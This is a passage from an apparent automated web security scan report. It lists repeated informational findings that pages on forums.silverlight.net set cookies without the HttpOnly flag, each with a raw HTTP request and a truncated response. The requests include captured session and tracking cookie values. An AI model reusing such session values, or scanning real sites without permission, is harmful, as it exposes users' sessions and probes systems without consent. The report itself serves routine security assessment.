Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:33 GMT; expires=Sun, 29-Jan-2012 23:17:33 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...

17.176. http://forums.silverlight.net/forums/46.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/46.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/46.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72228
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:51 GMT; expires=Sun, 29-Jan-2012 23:17:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Access
...[SNIP]...

17.177. http://forums.silverlight.net/forums/51.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/51.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/51.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 68826
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   New Fe
...[SNIP]...

17.178. http://forums.silverlight.net/forums/52.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/52.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/52.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 68254
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:00 GMT; expires=Sun, 29-Jan-2012 23:18:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Game D
...[SNIP]...

17.179. http://forums.silverlight.net/forums/53.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/53.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/53.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73495
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:54 GMT; expires=Sun, 29-Jan-2012 23:17:54 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:54 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   WCF RI
...[SNIP]...

17.180. http://forums.silverlight.net/forums/56.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/56.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/56.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 61545
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Jobs :
...[SNIP]...

17.181. http://forums.silverlight.net/forums/59.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/59.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/59.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73671
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:30 GMT; expires=Sun, 29-Jan-2012 23:17:30 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:30 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...

17.182. http://forums.silverlight.net/forums/63.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/63.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/63.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71202
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:04 GMT; expires=Sun, 29-Jan-2012 23:18:04 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...

17.183. http://forums.silverlight.net/forums/64.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/64.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/64.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71929
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:48 GMT; expires=Sun, 29-Jan-2012 23:17:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   MVVM /
...[SNIP]...

17.184. http://forums.silverlight.net/forums/65.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/65.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/65.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 64898
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:42 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Manage
...[SNIP]...

17.185. http://forums.silverlight.net/forums/66.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/66.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/66.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 65198
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:05 GMT; expires=Sun, 29-Jan-2012 23:18:05 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...

17.186. http://forums.silverlight.net/forums/67.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/67.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/67.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 65193
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:43 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Perfor
...[SNIP]...

17.187. http://forums.silverlight.net/forums/68.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/68.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/68.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76391
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:58 GMT; expires=Sun, 29-Jan-2012 23:17:58 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   PivotV
...[SNIP]...

17.188. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/TopicsNotAnswered.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73694
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:39 GMT; expires=Sun, 29-Jan-2012 23:20:39 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Thread
...[SNIP]...

17.189. http://forums.silverlight.net/forums/p/217026/518297.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217026/518297.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217026/518297.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 107413
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:38 GMT; expires=Sun, 29-Jan-2012 23:20:38 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:38 GMT; path=/
X-Powered-By: ASP.NET
